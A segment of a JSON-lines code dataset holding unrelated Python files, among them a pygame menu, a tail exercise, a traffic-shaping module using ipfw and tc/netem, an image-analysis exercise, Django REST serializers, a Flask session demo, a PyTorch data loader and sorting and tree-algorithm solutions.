quitGame = Button.Button(gameDisplay, white, green, white, (120, 430), (325, 50), \" QUIT\")\n\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n if findButton.buttonDetect(quitGame):\n running = False\n pygame.quit()\n quit()\n\n elif findButton.buttonDetect(play):\n running = False\n Game.game(24)\n\n elif findButton.buttonDetect(highscore):\n running = False\n highscores.highscores()\n\n else:\n running = True\nmenu()\n","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"113211258","text":"# 15. 末尾のN行を出力\n# 自然数Nをコマンドライン引数などの手段で受け取り,入力のうち末尾のN行だけを表示せよ.確認にはtailコマンドを用いよ.\n\n\ndef tail(pathfile, n):\n with open(pathfile, encoding='utf-8') as f:\n lines = f.readlines()\n result = []\n for i in range(1, n):\n i = -i\n result.append(lines[i].strip())\n result.reverse()\n\n return print(result)\n\n\nif __name__ == '__main__':\n path = '../hightemp_test.txt'\n tail(path, 6)\n","sub_path":"houjing.wei/chapter02/knock15.py","file_name":"knock15.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"106088871","text":"PROG_DAEMONIZE = False\nSRV_PORT = 10002\n\nDEBUG_LOG = None # None or True\nLOG_FILE_LOCATION = None\nLOG_FILE_NAME = None\nLOG_FILE_LOCATIONS_CLIENTS = None\n#spot_sensor.log\"\n\nPDI_FILE_SENSOR = '/tmp/spot_sensor.pid'\n\n\nSPOT_SENSOR = {}\nAUTO_DISCOVERY = None\nSLEEP_TIMER = None\nSLEEP_TIMER_IN = None\nSLEEP_TIMER_OUT = 1\nMAX_TIME_NOT_SEEN = None\nSENSOR_AVAILABLE = None\n\nIP_CCU = None\nCCU_CONNECTION_OK = None\n\nPDI_FILE = '/tmp/spot_check.pid'\n\nPROG_DIR = \"/opt/spot\"\nCFG = None\n\nPIFACECAD_SUPPORT = None\n\nRGBLED_SUPPORT = None\nRGBLED_RED = None\nRGBLED_GREEN = None\nRGBLED_BLUE = None\n\nBT_SUPPORT = None\n\nSYS_ENCODING = None\nABS_PATH = None\nDB_FILE = None\n","sub_path":"core/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"372324506","text":"# Copyright 2017 Google Inc. All rights reserved.\n# Use of this source code is governed by the Apache 2.0 license that can be\n# found in the LICENSE file.\n\"\"\"Cross-platform support for traffic-shaping\"\"\"\nimport logging\nimport os\nimport platform\nimport re\nimport subprocess\n\nclass TrafficShaper(object):\n \"\"\"Main traffic-shaper interface\"\"\"\n def __init__(self, shaper_name):\n self.support_path = os.path.join(os.path.abspath(os.path.dirname(__file__)), \"support\")\n self.shaper = None\n if shaper_name is not None:\n if shaper_name == 'none':\n self.shaper = NoShaper()\n else:\n plat = platform.system()\n if plat == \"Windows\":\n winver = float(\".\".join(platform.version().split('.')[:2]))\n if winver >= 8.1:\n self.shaper = WinShaper()\n else:\n self.shaper = Dummynet()\n elif plat == \"Linux\":\n self.shaper = NetEm()\n\n def install(self):\n \"\"\"Install and configure the traffic-shaper\"\"\"\n ret = False\n if self.shaper is not None:\n ret = self.shaper.install()\n return ret\n\n def remove(self):\n \"\"\"Uninstall traffic-shaping\"\"\"\n ret = False\n if self.shaper is not None:\n ret = self.shaper.remove()\n return ret\n\n def reset(self):\n \"\"\"Disable traffic-shaping\"\"\"\n ret = False\n if self.shaper is not None:\n ret = self.shaper.reset()\n return ret\n\n def configure(self, job):\n \"\"\"Enable traffic-shaping\"\"\"\n ret = False\n in_bps = 0\n if 'bwIn' in job:\n in_bps = int(job['bwIn']) * 1000\n out_bps = 0\n if 'bwOut' in job:\n out_bps = int(job['bwOut']) * 1000\n rtt = 0\n if 'latency' in job:\n rtt = int(job['latency'])\n plr = .0\n if 'plr' in job:\n plr = float(job['plr'])\n if self.shaper is not None:\n ret = self.shaper.configure(in_bps, out_bps, rtt, plr)\n return ret\n\n\n#\n# NoShaper\n#\nclass NoShaper(object):\n \"\"\"Allow resets but fail any explicit shaping\"\"\"\n def __init__(self):\n pass\n\n def install(self):\n \"\"\"Install and configure the traffic-shaper\"\"\"\n return True\n\n def remove(self):\n \"\"\"Uninstall traffic-shaping\"\"\"\n return True\n\n def reset(self):\n \"\"\"Disable traffic-shaping\"\"\"\n return True\n\n def configure(self, in_bps, out_bps, rtt, plr):\n \"\"\"Enable traffic-shaping\"\"\"\n if in_bps > 0 or out_bps > 0 or rtt > 0 or plr > 0:\n return False\n return True\n\n#\n# winshaper\n#\nclass WinShaper(object):\n \"\"\"Windows 8.1+ traffic-shaper using winshaper\"\"\"\n def __init__(self):\n self.exe = os.path.join(os.path.abspath(os.path.dirname(__file__)),\n \"support\", \"winshaper\", \"shaper.exe\")\n\n def shaper(self, args):\n \"\"\"Run a shaper command with elevated permissions\"\"\"\n from .os_util import run_elevated\n return run_elevated(self.exe, ' '.join(args)) == 0\n\n def install(self):\n \"\"\"Install and configure the traffic-shaper\"\"\"\n return self.shaper(['install'])\n\n def remove(self):\n \"\"\"Uninstall traffic-shaping\"\"\"\n return self.shaper(['remove'])\n\n def reset(self):\n \"\"\"Disable traffic-shaping\"\"\"\n return self.shaper(['reset'])\n\n def configure(self, in_bps, out_bps, rtt, plr):\n \"\"\"Enable traffic-shaping\"\"\"\n return self.shaper(['set',\n 'inbps={0:d}'.format(in_bps),\n 'outbps={0:d}'.format(out_bps),\n 'rtt={0:d}'.format(rtt),\n 'plr={0:.2f}'.format(plr)])\n\n#\n# Dummynet\n#\nclass Dummynet(object):\n \"\"\"Dummynet support (windows only currently)\"\"\"\n def __init__(self):\n self.exe = os.path.join(os.path.abspath(os.path.dirname(__file__)),\n \"support\", \"dummynet\")\n if platform.machine().endswith('64'):\n self.exe = os.path.join(self.exe, \"x64\", \"ipfw.exe\")\n else:\n self.exe = os.path.join(self.exe, \"x86\", \"ipfw.exe\")\n\n def ipfw(self, args):\n \"\"\"Run a single ipfw command\"\"\"\n from .os_util import run_elevated\n return run_elevated(self.exe, ' '.join(args)) == 0\n\n def install(self):\n \"\"\"Set up the pipes\"\"\"\n return self.ipfw(['-q', 'flush']) and\\\n self.ipfw(['-q', 'pipe', 'flush']) and\\\n self.ipfw(['pipe', '1', 'config', 'delay', '0ms', 'noerror']) and\\\n self.ipfw(['pipe', '2', 'config', 'delay', '0ms', 'noerror']) and\\\n self.ipfw(['queue', '1', 'config', 'pipe', '1', 'queue', '100', \\\n 'noerror', 'mask', 'dst-port', '0xffff']) and\\\n self.ipfw(['queue', '2', 'config', 'pipe', '2', 'queue', '100', \\\n 'noerror', 'mask', 'dst-port', '0xffff']) and\\\n self.ipfw(['add', 'queue', '1', 'ip', 'from', 'any', 'to', 'any', 'in']) and\\\n self.ipfw(['add', 'queue', '2', 'ip', 'from', 'any', 'to', 'any', 'out']) and\\\n self.ipfw(['add', '60000', 'allow', 'ip', 'from', 'any', 'to', 'any'])\n\n def remove(self):\n \"\"\"clear the config\"\"\"\n return self.ipfw(['-q', 'flush']) and\\\n self.ipfw(['-q', 'pipe', 'flush'])\n\n def reset(self):\n \"\"\"Disable traffic-shaping\"\"\"\n return self.ipfw(['pipe', '1', 'config', 'delay', '0ms', 'noerror']) and\\\n self.ipfw(['pipe', '2', 'config', 'delay', '0ms', 'noerror']) and\\\n self.ipfw(['queue', '1', 'config', 'pipe', '1', 'queue', '100', \\\n 'noerror', 'mask', 'dst-port', '0xffff']) and\\\n self.ipfw(['queue', '2', 'config', 'pipe', '2', 'queue', '100', \\\n 'noerror', 'mask', 'dst-port', '0xffff'])\n\n def configure(self, in_bps, out_bps, rtt, plr):\n \"\"\"Enable traffic-shaping\"\"\"\n # inbound connection\n in_kbps = int(in_bps / 1000)\n in_latency = rtt / 2\n if rtt % 2:\n in_latency += 1\n in_command = ['pipe', '1', 'config']\n if in_kbps > 0:\n in_command.extend(['bw', '{0:d}Kbit/s'.format(in_kbps)])\n if in_latency >= 0:\n in_command.extend(['delay', '{0:d}ms'.format(in_latency)])\n\n # outbound connection\n out_kbps = int(out_bps / 1000)\n out_latency = rtt / 2\n out_command = ['pipe', '2', 'config']\n if out_kbps > 0:\n out_command.extend(['bw', '{0:d}Kbit/s'.format(out_kbps)])\n if out_latency >= 0:\n out_command.extend(['delay', '{0:d}ms'.format(out_latency)])\n\n # Packet loss get applied to the queues\n plr = plr / 100.0\n in_queue_command = ['queue', '1', 'config', 'pipe', '1', 'queue', '100']\n out_queue_command = ['queue', '2', 'config', 'pipe', '2', 'queue', '100']\n if plr > 0.0 and plr <= 1.0:\n in_queue_command.extend(['plr', '{0:.4f}'.format(plr)])\n out_queue_command.extend(['plr', '{0:.4f}'.format(plr)])\n in_queue_command.extend(['mask', 'dst-port', '0xffff'])\n out_queue_command.extend(['mask', 'dst-port', '0xffff'])\n\n return self.ipfw(in_command) and\\\n self.ipfw(out_command) and\\\n self.ipfw(in_queue_command) and\\\n self.ipfw(out_queue_command)\n\n#\n# netem\n#\nclass NetEm(object):\n \"\"\"Linux traffic-shaper using netem/tc\"\"\"\n def __init__(self):\n self.interface = None\n\n def install(self):\n \"\"\"Install and configure the traffic-shaper\"\"\"\n ret = False\n\n # Figure out the default interface\n try:\n out = subprocess.check_output(['route'])\n routes = out.splitlines()\n match = re.compile(r'^([^\\s]+)\\s+[^\\s]+\\s+[^\\s]+\\s+[^\\s]+\\s+'\\\n r'[^\\s]+\\s+[^\\s]+\\s+[^\\s]+\\s+([^\\s]+)')\n for route in routes:\n fields = re.search(match, route)\n if fields:\n destination = fields.group(1)\n if destination == 'default':\n self.interface = fields.group(2)\n logging.debug(\"Default interface: %s\", self.interface)\n break\n\n if self.interface:\n # Set up the ifb interface so inbound traffic can be shaped\n subprocess.call(['sudo', 'modprobe', 'ifb'])\n subprocess.call(['sudo', 'ip', 'link', 'set', 'dev', 'ifb0', 'up'])\n subprocess.call(['sudo', 'tc', 'qdisc', 'add', 'dev', self.interface, 'ingress'])\n subprocess.call(['sudo', 'tc', 'filter', 'add', 'dev', self.interface, 'parent',\n 'ffff:', 'protocol', 'ip', 'u32', 'match', 'u32', '0', '0',\n 'flowid', '1:1', 'action', 'mirred', 'egress', 'redirect',\n 'dev', 'ifb0'])\n self.reset()\n ret = True\n else:\n logging.critical(\"Unable to identify default interface using 'route'\")\n except Exception as err:\n logging.debug(\"Error configuring netem: %s\", err.__str__())\n return ret\n\n def remove(self):\n \"\"\"Uninstall traffic-shaping\"\"\"\n return True\n\n def reset(self):\n \"\"\"Disable traffic-shaping\"\"\"\n ret = False\n if self.interface is not None:\n ret = subprocess.call(['sudo', 'tc', 'qdisc', 'del', 'dev', 'ifb0', 'root']) == 0 and\\\n subprocess.call(['sudo', 'tc', 'qdisc', 'del', 'dev', self.interface,\n 'root']) == 0\n return ret\n\n def configure(self, in_bps, out_bps, rtt, plr):\n \"\"\"Enable traffic-shaping\"\"\"\n ret = False\n if self.interface is not None:\n in_latency = rtt / 2\n if rtt % 2:\n in_latency += 1\n if self.configure_interface('ifb0', in_bps, in_latency, plr):\n ret = self.configure_interface(self.interface, out_bps, rtt / 2, plr)\n return ret\n\n def configure_interface(self, interface, bps, latency, plr):\n \"\"\"Configure traffic-shaping for a single interface\"\"\"\n ret = False\n args = ['sudo', 'tc', 'qdisc', 'add', 'dev', interface, 'root', 'handle',\n '1:0', 'netem', 'delay', '{0:d}ms'.format(latency)]\n if plr > 0:\n args.extend(['loss', '{0:.2f}%'.format(plr)])\n ret = subprocess.call(args) == 0\n if ret and bps > 0:\n kbps = int(bps / 1000)\n args = ['sudo', 'tc', 'qdisc', 'add', 'dev', interface, 'parent', '1:1',\n 'handle', '10:', 'tbf', 'rate', '{0:d}kbit'.format(kbps),\n 'buffer', '150000', 'limit', '150000']\n ret = subprocess.call(args) == 0\n return ret\n","sub_path":"internal/traffic_shaping.py","file_name":"traffic_shaping.py","file_ext":"py","file_size_in_byte":11040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"452439294","text":"# ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: #\n# Date: 03.11.2016 #\n# Author: Ole-Johan Skrede #\n# #\n# Solution proposal as part of the exercise program in #\n# INF4300 - Digital image analysis at the University of Oslo #\n# #\n# ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: #\n\"\"\"\nSolution proposal for exercise 10, task 5.\n\"\"\"\n\n# pylint: disable=expression-not-assigned\n# pylint: disable=bad-indentation\n\nimport os\n\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nfrom scipy import ndimage # pylint: disable=import-error\n#import seaborn as sns # pylint: disable=import-error,unused-import\n\ndef plot_image(image, fig_num, name=None, colormap='gray', write_file=None):\n \"\"\"Plot image\"\"\"\n fig = plt.figure(fig_num)\n plt.imshow(image, cmap=colormap, interpolation='none')\n if name is not None:\n plt.title(name)\n plt.xticks([]), plt.yticks([])\n plt.tight_layout()\n if write_file:\n fig.savefig(write_file, bbox_inches='tight', pad_inches=0)\n fig_num += 1\n return fig_num\n\ndef main():\n \"\"\"main\"\"\"\n\n print('='*80)\n print('Solution to weekly exercises in INF4300')\n print('Exercise 10')\n print('Task 5')\n print('-'*80)\n\n fig_num = 0\n image_dir = '../../images'\n write_dir = 'results/images'\n\n pcb_image = cv2.imread(os.path.join(image_dir, 'pcb.jpg'), cv2.IMREAD_GRAYSCALE)\n pcb_image = (pcb_image >= 128).astype(np.uint8)\n fig_num = plot_image(pcb_image, fig_num,\n write_file=os.path.join(write_dir, 'pcb_orig.png'))\n\n pcb_filled = ndimage.binary_fill_holes(pcb_image).astype(np.uint8)\n fig_num = plot_image(pcb_filled, fig_num,\n write_file=os.path.join(write_dir, 'pcb_filled.png'))\n\n pcb_holes = pcb_filled - pcb_image\n fig_num = plot_image(pcb_holes, fig_num,\n write_file=os.path.join(write_dir, 'pcb_holes.png'))\n\n _, pcb_labeled, stats, centroids = cv2.connectedComponentsWithStats(pcb_holes)\n area = stats[1:, 4]\n centroids = centroids[1:, :]\n\n fig = plt.figure(fig_num)\n height, width = pcb_holes.shape\n plt.imshow(pcb_labeled, cmap='magma', interpolation='none')\n plt.xticks([]), plt.yticks([])\n plt.tight_layout()\n\n for obj_ind, obj_area in enumerate(area):\n diameter = 2*np.sqrt(obj_area / np.pi) # Assuming circular objects\n diam_str = '{:.2f}'.format(diameter)\n plt.text(centroids[obj_ind, 0], centroids[obj_ind, 1], diam_str,\n color='green', fontsize=14, weight='bold')\n\n plt.plot(centroids[obj_ind, 0], centroids[obj_ind, 1], 'ro')\n axes = plt.gca()\n axes.set_xlim([0, width-1])\n axes.set_ylim([height-1, 0])\n fig.savefig(os.path.join(write_dir, 'pcb_labeled.png'), bbox_inches='tight', pad_inches=0)\n\n\n plt.show()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"solutions/week_10/inf4300_h16_ex10_t05.py","file_name":"inf4300_h16_ex10_t05.py","file_ext":"py","file_size_in_byte":3072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"513340361","text":"from rest_framework import permissions\n\nclass IsSlotModificationAllowed(permissions.BasePermission):\n \"\"\"\n Object-level permission to only allow owners of an object to edit it.\n Assumes the model instance has an `owner` attribute.\n \"\"\"\n\n def has_object_permission(self, request, view, obj):\n # Read permissions are allowed to any request,\n # so we'll always allow GET, HEAD or OPTIONS requests.\n if request.method in permissions.SAFE_METHODS:\n return True\n print(request.data)\n if hasattr(request.data, 'is_locked'):\n if obj.is_empty:\n self.message('You can not lock an empty slot')\n\n return True","sub_path":"helmet_zones/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"511341261","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass createTree:\n def create(self, nodes):\n root = TreeNode(nodes.pop(0))\n queue = [root]\n while queue:\n p = queue.pop(0)\n if nodes:\n node = nodes.pop(0)\n if node:\n queue.append(self.insert_left(p, node))\n if nodes:\n node = nodes.pop(0)\n if node:\n queue.append(self.insert_right(p, node))\n\n return root\n\n def insert_left(self, root, left):\n new = TreeNode(left)\n root.left = new\n return new\n\n def insert_right(self, root, right):\n new = TreeNode(right)\n root.right = new\n return new\n\n\nclass Solution:\n def rob(self, root: TreeNode) -> int:\n if not root:\n return 0\n money = root.val\n if root.left:\n money += self.rob(root.left.left) + self.rob(root.left.right)\n if root.right:\n money += self.rob(root.right.left) + self.rob(root.right.right)\n\n return max(money, self.rob(root.left) + self.rob(root.right))\n\n\nclass Solution1:\n def __init__(self):\n self.dic = {}\n\n def rob(self, root: TreeNode) -> int:\n if not root:\n return 0\n if root in self.dic:\n return self.dic[root]\n money = root.val\n if root.left:\n money += self.rob(root.left.left) + self.rob(root.left.right)\n if root.right:\n money += self.rob(root.right.left) + self.rob(root.right.right)\n res = max(money, self.rob(root.left) + self.rob(root.right))\n self.dic[root] = res\n\n return res\n\n\nclass Solution2:\n def rob(self, root: TreeNode) -> int:\n res = self.my_rob(root)\n return max(res[0], res[1])\n\n def my_rob(self, root):\n res = [0, 0]\n if not root:\n return res\n left = self.my_rob(root.left)\n right = self.my_rob(root.right)\n res[0] = max(left[0], left[1]) + max(right[0], right[1])\n res[1] = left[0] + right[0] + root.val\n\n return res\n\n\nif __name__ == '__main__':\n nodes = [3, 2, 3, None, 3, None, 1]\n root = createTree().create(nodes)\n print(Solution().rob(root))\n print(Solution1().rob(root))\n print(Solution2().rob(root))\n","sub_path":"301_350/337_house_robber_iii.py","file_name":"337_house_robber_iii.py","file_ext":"py","file_size_in_byte":2429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"145638959","text":"from django.utils import timezone\n\nfrom rest_framework import serializers\nfrom rest_framework.validators import UniqueValidator\n\nfrom reviews.models import Category, Comment, Genre, Review, Title, User\n\n\nclass ReviewSerializer(serializers.ModelSerializer):\n author = serializers.SlugRelatedField(\n slug_field='username',\n read_only=True,\n default=serializers.CurrentUserDefault()\n )\n title = serializers.SlugRelatedField(\n slug_field='pk',\n read_only=True\n )\n\n class Meta:\n fields = ('id', 'text', 'author', 'score', 'pub_date', 'title')\n model = Review\n\n def validate(self, data):\n author = self.context['request'].user\n title_id = self.context.get('view').kwargs.get('title_id')\n if (Review.objects.filter(author=author, title=title_id).exists()\n and self.context['request'].method != 'PATCH'):\n raise serializers.ValidationError('Вы уже оставляли отзыв')\n return data\n\n\nclass CommentSerializer(serializers.ModelSerializer):\n author = serializers.SlugRelatedField(slug_field='username',\n read_only=True,)\n\n class Meta:\n fields = ('id', 'text', 'author', 'pub_date')\n model = Comment\n\n\nclass CategorySerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Category\n exclude = ['id']\n\n\nclass GenreSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Genre\n exclude = ['id']\n\n\nclass TitleSerializerRead(serializers.ModelSerializer):\n genre = GenreSerializer(many=True)\n category = CategorySerializer()\n rating = serializers.IntegerField(read_only=True)\n\n class Meta:\n model = Title\n fields = ('name', 'year', 'description', 'genre',\n 'category', 'rating', 'id')\n\n\nclass TitleSerializer(serializers.ModelSerializer):\n genre = serializers.SlugRelatedField(\n queryset=Genre.objects.all(),\n required=False,\n slug_field='slug',\n many=True,\n )\n category = serializers.SlugRelatedField(\n queryset=Category.objects.all(),\n required=False,\n slug_field='slug'\n )\n\n class Meta:\n model = Title\n fields = ('__all__')\n\n def validate_year(self, value):\n\n year = timezone.now().year\n if value > year:\n raise serializers.ValidationError(\n 'Проверьте год издания произведения!'\n )\n return value\n\n\nclass RegisterSerializer(serializers.ModelSerializer):\n\n email = serializers.EmailField(\n max_length=150,\n required=True,\n validators=[UniqueValidator(queryset=User.objects.all())]\n )\n username = serializers.CharField(\n max_length=150,\n required=True,\n validators=[UniqueValidator(queryset=User.objects.all())]\n )\n\n ERROR_ME_USERNAME_RESTRICTED = {\n 'username': 'registration \"me\" username restricted'}\n\n class Meta:\n fields = ['email', 'username']\n model = User\n\n def validate_username(self, value):\n if value == 'me':\n raise serializers.ValidationError(\n self.ERROR_ME_USERNAME_RESTRICTED\n )\n return value\n\n def create(self, validated_data):\n return User.objects.create(**validated_data)\n\n\nclass TokenSerializer(serializers.Serializer):\n\n username = serializers.CharField(\n required=True,\n max_length=150,\n )\n\n confirmation_code = serializers.CharField(\n required=True,\n max_length=555,\n )\n\n class Meta:\n fields = ['username', 'confirmation_code']\n\n\nclass UserSerializer(serializers.ModelSerializer):\n\n email = serializers.EmailField(\n max_length=150,\n required=True,\n validators=[UniqueValidator(queryset=User.objects.all())]\n )\n username = serializers.CharField(\n max_length=150,\n required=True,\n validators=[UniqueValidator(queryset=User.objects.all())]\n )\n\n def validate_username(self, value):\n if value == 'me':\n raise serializers.ValidationError(\n self.ERROR_ME_USERNAME_RESTRICTED\n )\n return value\n\n class Meta:\n fields = ['username', 'email', 'first_name',\n 'last_name', 'bio', 'role']\n model = User\n\n\nclass MeSerializer(serializers.ModelSerializer):\n\n email = serializers.EmailField(\n max_length=150,\n required=True,\n validators=[UniqueValidator(queryset=User.objects.all())]\n )\n username = serializers.CharField(\n max_length=150,\n required=True,\n validators=[UniqueValidator(queryset=User.objects.all())]\n )\n\n role = serializers.CharField(\n max_length=150,\n read_only=True\n )\n\n def validate_username(self, value):\n if value == 'me':\n raise serializers.ValidationError(\n self.ERROR_ME_USERNAME_RESTRICTED\n )\n return value\n\n class Meta:\n fields = ['username', 'email', 'first_name',\n 'last_name', 'bio', 'role']\n model = User\n","sub_path":"api_yamdb/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":5180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"7449355","text":"import os\n\nfrom flask import Flask, request, redirect, url_for, abort, make_response, session, g\n\napp = Flask(__name__)\napp.secret_key = os.getenv('SECRET_KEY', 'dasdadadsasd')\n\n\n@app.route('/hello', methods=['GET', 'POST'])\ndef hello():\n name = request.args.get('name')\n if name is None:\n name = request.cookies.get('name', 'Human')\n response = '<h1>Hello, %s!</h1>' % name\n # 根据用户认证状态返回不同的内容\n if 'logged_in' in session:\n response += '[Authenticated]'\n else:\n response += '[Not Authenticated]'\n return response\n\n\n# 钩子函数\n@app.before_request\ndef do_something():\n pass\n\n\n# 重定向\n@app.route('/')\ndef redirects():\n return redirect(url_for('hello'))\n\n\n# 错误处理\n@app.route('/404')\ndef not_found():\n abort(404)\n\n\n# 指定数据的MIME类型\n@app.route('/foo')\ndef foo():\n response = make_response({\n \"note\": {\n\n \"to\": \"Peter\",\n \"from\": \"Jane\",\n \"heading\": \"Remider\",\n \"body\": \"Don't forget the party!\"\n }\n }\n )\n\n response.mimetype = 'application/json'\n return response\n\n\n# 给浏览器设置cookie\n@app.route('/set/<name>')\ndef set_cookie(name):\n response = make_response(redirect(url_for('hello')))\n response.set_cookie('name', name)\n return response\n\n\n# 使用session模拟用户的认证功能\n@app.route('/login')\ndef login():\n session['logged_in'] = True # 写入\n return redirect(url_for('hello'))\n\n\n# 管理页面查看是否用户已经登陆\n@app.route('/admin')\ndef admin():\n if 'logged_in' not in session:\n abort(403)\n return 'Welcome to admin page.'\n\n\n# 登出用户\n@app.route('/logout')\ndef logout():\n if 'logged_in' in session:\n session.pop('logged_in')\n return redirect(url_for('hello'))\n\n\n# 上下文全局变量\n@app.before_request\ndef get_name():\n g.name = request.args.get('name')\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"demos/http/http_app.py","file_name":"http_app.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"303919381","text":"import torch\n\nimport numpy as np \nfrom collections import defaultdict\n\nimport torch.utils.data as data\nimport config_abae_rs as conf\n\nfrom copy import deepcopy\n\ntrain_data_path = '%s/%s.train.data' % (conf.target_path, conf.data_name)\nval_data_path = '%s/%s.val.data' % (conf.target_path, conf.data_name)\ntest_data_path = '%s/%s.test.data' % (conf.target_path, conf.data_name)\n\nPAD = 0\n\ndef load_all():\n user_seq_dict = defaultdict(list)\n item_seq_dict = defaultdict(list)\n\n train_data = {}\n f = open(train_data_path)\n for idx, line in enumerate(f):\n line = eval(line)\n user, item, rating, abae_review = \\\n line['user'], line['item'], line['rating'], line['abae_review']\n train_data[idx] = [user, item, rating, abae_review]\n\n for sent in abae_review:\n sent = sent[:conf.seq_len]\n sent.extend([PAD]*(conf.seq_len - len(sent)))\n user_seq_dict[user].append(sent)\n item_seq_dict[item].append(sent)\n\n val_data = {}\n f = open(val_data_path)\n for idx, line in enumerate(f):\n line = eval(line)\n user, item, rating, abae_review = \\\n line['user'], line['item'], line['rating'], line['abae_review']\n val_data[idx] = [user, item, rating, abae_review]\n \n test_data = {}\n f = open(test_data_path)\n for idx, line in enumerate(f):\n line = eval(line)\n user, item, rating, abae_review = \\\n line['user'], line['item'], line['rating'], line['abae_review']\n test_data[idx] = [user, item, rating, abae_review]\n\n for user in user_seq_dict:\n if len(user_seq_dict[user]) < conf.user_seq_num:\n user_seq_dict[user].extend([[PAD]*conf.seq_len]*(conf.user_seq_num-len(user_seq_dict[user])))\n else:\n user_seq_dict[user] = user_seq_dict[user][:conf.user_seq_num]\n\n for item in item_seq_dict:\n if len(item_seq_dict[item]) < conf.item_seq_num:\n item_seq_dict[item].extend([[PAD]*conf.seq_len]*(conf.item_seq_num-len(item_seq_dict[item])))\n else:\n item_seq_dict[item] = item_seq_dict[item][:conf.item_seq_num]\n\n '''\n user_seq_num_list = []\n item_seq_num_list = []\n for user in user_seq_dict:\n user_seq_num_list.append(len(user_seq_dict[user]))\n for item in item_seq_dict:\n item_seq_num_list.append(len(item_seq_dict[item]))\n\n user_seq_num_list.sort()\n item_seq_num_list.sort()\n\n print('user:%d' % user_seq_num_list[int(0.85*len(user_seq_num_list))])\n print('item:%d' % item_seq_num_list[int(0.85*len(item_seq_num_list))])\n '''\n\n return train_data, val_data, test_data, user_seq_dict, item_seq_dict\n\nclass TrainData():\n def __init__(self, train_data, user_seq_dict=None, item_seq_dict=None):\n self.train_data = train_data\n self.user_seq_dict = user_seq_dict\n self.item_seq_dict = item_seq_dict\n\n self.length = len(train_data.keys())\n\n def get_batch(self, batch_idx_list):\n user_list, item_list, label_list = [], [], []\n user_pos_sent, user_neg_sent = [], []\n item_pos_sent, item_neg_sent = [], []\n for idx in batch_idx_list:\n user, item, label = self.train_data[idx][0], self.train_data[idx][1], self.train_data[idx][2]\n\n user_list.append(user)\n item_list.append(item)\n label_list.append(label)\n \n try: \n user_pos_sent.extend(self.user_seq_dict[user])\n for _ in self.user_seq_dict[user]:\n for _ in range(conf.num_neg_sent):\n j = np.random.randint(conf.num_users-1)\n while j == user or j not in self.user_seq_dict:\n j = np.random.randint(self.length-1)\n xx = np.random.randint(conf.user_seq_num-1)\n user_neg_sent.append(self.user_seq_dict[j][xx])\n\n item_pos_sent.extend(self.item_seq_dict[item])\n for _ in self.item_seq_dict[item]:\n for _ in range(conf.num_neg_sent):\n j = np.random.randint(conf.num_items-1)\n while j == item or j not in self.item_seq_dict:\n j = np.random.randint(self.length-1)\n xx = np.random.randint(conf.item_seq_num-1)\n item_neg_sent.append(self.item_seq_dict[j][xx])\n except:\n import pdb; pdb.set_trace()\n \n\n return torch.LongTensor(user_list).cuda(), \\\n torch.LongTensor(item_list).cuda(), \\\n torch.FloatTensor(label_list).cuda(), \\\n torch.LongTensor(user_pos_sent).cuda(), \\\n torch.LongTensor(user_neg_sent).cuda(), \\\n torch.LongTensor(item_pos_sent).cuda(), \\\n torch.LongTensor(item_neg_sent).cuda()\n ","sub_path":"drive/My Drive/task/aspect_based_rs/src/amazon_pet/abae_rs/DataModule_abae_rs.py","file_name":"DataModule_abae_rs.py","file_ext":"py","file_size_in_byte":4856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"405638876","text":"import time\nfrom Swap import _swap\n\n\ndef selection_sort(data_list, draw_data, time_value):\n \"\"\"\n Does a selection sort on a list and visualizes it\n Expected Complexity (Sort only): O(n^2) (time) and O(1) (space)\n\n :param data_list: Python list to be sorted\n :param draw_data: Function written in main.py to visualize the list\n :param time_value: Float based on the input for the time between steps\n \"\"\"\n for i in range(len(data_list)):\n min_index = i\n\n # locates the min in the remaining elements and move it to the bottom\n for j in range(i + 1, len(data_list)):\n if data_list[min_index] > data_list[j]:\n min_index = j\n\n # generate the color list to be visualized\n color_list = [\"red\" for x in range(len(data_list))]\n\n # color the min index blue\n for x in range(len(data_list)):\n if x == min_index:\n color_list[x] = \"blue\"\n\n # visualize the list and wait for the specified amount of time\n draw_data(data_list, color_list)\n time.sleep(time_value)\n\n _swap(data_list, i, min_index)\n\n # generate the color list to be visualized\n color_list = [\"red\" for x in range(len(data_list))]\n\n # color the values being swapped green\n for x in range(len(color_list)):\n if (x == i) or (x == min_index):\n color_list[x] = \"green\"\n\n # visualize the list and wait for the specified amount of time\n draw_data(data_list, color_list)\n time.sleep(time_value)\n\n # color the whole list green after the sort\n draw_data(data_list, [\"green\" for i in 